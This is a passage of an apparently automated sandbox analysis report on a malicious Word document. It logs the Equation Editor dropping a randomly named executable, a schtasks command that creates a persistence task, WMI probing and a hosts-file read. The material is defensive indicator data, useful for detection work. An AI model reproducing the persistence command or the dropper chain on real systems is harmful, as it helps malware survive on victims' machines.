                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeCode function: 4_2_00456529
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeCode function: 4_2_00454E92
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeCode function: 4_2_0045D09C
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeCode function: 4_2_0045C959
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeCode function: 4_2_0045C968
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeCode function: 4_2_004599C0
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeCode function: 4_2_0045A9BC
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeCode function: 4_2_0045CB48
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeCode function: 4_2_0045CB58
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeCode function: 4_2_0045AB3D
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeCode function: 4_2_0045AC71
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeCode function: 4_2_00457CB0
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeCode function: 4_2_0045CDA8
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeCode function: 4_2_0045CFA0
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeCode function: 4_2_00D568E8
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeCode function: 4_2_00D59080
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeCode function: 4_2_00D56468
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeCode function: 4_2_00D59408
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeCode function: 4_2_00D5AD01
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeCode function: 4_2_00D52900
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeCode function: 4_2_00D59E88
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeCode function: 4_2_00D597E8
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeCode function: 4_2_00D54B68
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeCode function: 4_2_00D568D7
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeCode function: 4_2_00D528F8
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeCode function: 4_2_00D56458
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeCode function: 4_2_00D50048
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeCode function: 4_2_00D59071
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeCode function: 4_2_00D50006
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeCode function: 4_2_00D5A250
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeCode function: 4_2_00D59E78
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeCode function: 4_2_00D5A260
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeCode function: 4_2_00D59E2F
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeCode function: 4_2_00D52BD0
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeCode function: 4_2_00D597D9
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeCode function: 4_2_00D52BC0
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeCode function: 4_2_00D593F9
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeCode function: 4_2_00D54F90
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeCode function: 4_2_00D54FA0
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeCode function: 4_2_00D54B1D
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeCode function: 4_2_00450330
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeCode function: 4_2_00450D98
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeCode function: 7_2_0040568C
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeCode function: 7_2_00402296
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeCode function: 7_2_002D5338
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeCode function: 7_2_002D6350
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeCode function: 7_2_002D5680
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeCode function: 7_2_002D208F
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeCode function: 7_2_0045B0C8
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeCode function: 7_2_0045AB48
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeCode function: 7_2_00453968
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeCode function: 7_2_0045CB18
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeCode function: 7_2_00456DF8
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeCode function: 7_2_00451798
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeCode function: 7_2_00456A70
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeCode function: 7_2_00459EE0
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeCode function: 7_2_00455BE0
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeCode function: 7_2_0045D3E0
                  Source: ZhIOjFmINIXbKXm[1].exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  Source: cAFIUeWyVQPJe.exe.4.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  Source: 7.2.rghbyjuyktyjrthbgvfsfhytrrgfsd.exe.400000.2.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                  Source: 7.2.rghbyjuyktyjrthbgvfsfhytrrgfsd.exe.400000.2.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                  Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winDOC@9/14@9/2
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$RFQ ..docJump to behavior
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeMutant created: \Sessions\1\BaseNamedObjects\uUxkFOSqwAhvdfFtRYTsdWC
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRC8DA.tmpJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ........................................(.P.............(................j......................................................................
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000004.00000002.2097158803.000000000285E000.00000004.00000001.sdmpBinary or memory string: Select * from UnmanagedMemoryStreamWrapper WHERE modelo=@modelo;?
                  Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000004.00000002.2097158803.000000000285E000.00000004.00000001.sdmpBinary or memory string: Select * from Clientes WHERE id=@id;;
                  Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000004.00000002.2097158803.000000000285E000.00000004.00000001.sdmpBinary or memory string: Select * from Aluguel5Erro ao listar Banco sql-UnmanagedMemoryStreamWrapper.INSERT INTO Aluguel VALUES(@clienteID, @data);
                  Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000004.00000002.2097158803.000000000285E000.00000004.00000001.sdmpBinary or memory string: INSERT INTO UnmanagedMemoryStreamWrapper VALUES(@modelo, @fabricante, @ano, @cor);
                  Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000004.00000002.2097158803.000000000285E000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
                  Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000004.00000002.2097158803.000000000285E000.00000004.00000001.sdmpBinary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
                  Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000004.00000002.2097158803.000000000285E000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
                  Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                  Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\cAFIUeWyVQPJe' /XML 'C:\Users\user\AppData\Local\Temp\tmpBFD6.tmp'
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeProcess created: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe
                  Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\cAFIUeWyVQPJe' /XML 'C:\Users\user\AppData\Local\Temp\tmpBFD6.tmp'
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeProcess created: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeCode function: 4_2_0136808F push es; iretd
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeCode function: 4_2_004583D6 push ss; iretd
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeCode function: 4_2_00459CD6 push esp; retn 003Fh
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeCode function: 4_2_00457F9B push ebp; retf
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeCode function: 4_2_00D5B15F pushad ; iretd
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeCode function: 4_2_00D5B169 pushad ; iretd
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeCode function: 4_2_00D55BD0 push esp; ret
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeCode function: 4_2_00D5232C push esi; iretd
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeCode function: 7_2_0136808F push es; iretd
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeCode function: 7_2_00450D48 pushad ; retf
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeCode function: 7_2_00451508 pushad ; iretd
                  Source: initial sampleStatic PE information: section name: .text entropy: 7.94722535195
                  Source: initial sampleStatic PE information: section name: .text entropy: 7.94722535195
                  Source: initial sampleStatic PE information: section name: .text entropy: 7.94722535195
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeJump to dropped file
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeFile created: C:\Users\user\AppData\Roaming\cAFIUeWyVQPJe.exeJump to dropped file
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ZhIOjFmINIXbKXm[1].exeJump to dropped file

                  Boot Survival:

                  barindex
                  Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\cAFIUeWyVQPJe' /XML 'C:\Users\user\AppData\Local\Temp\tmpBFD6.tmp'
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeProcess information set: NOOPENFILEERRORBOX
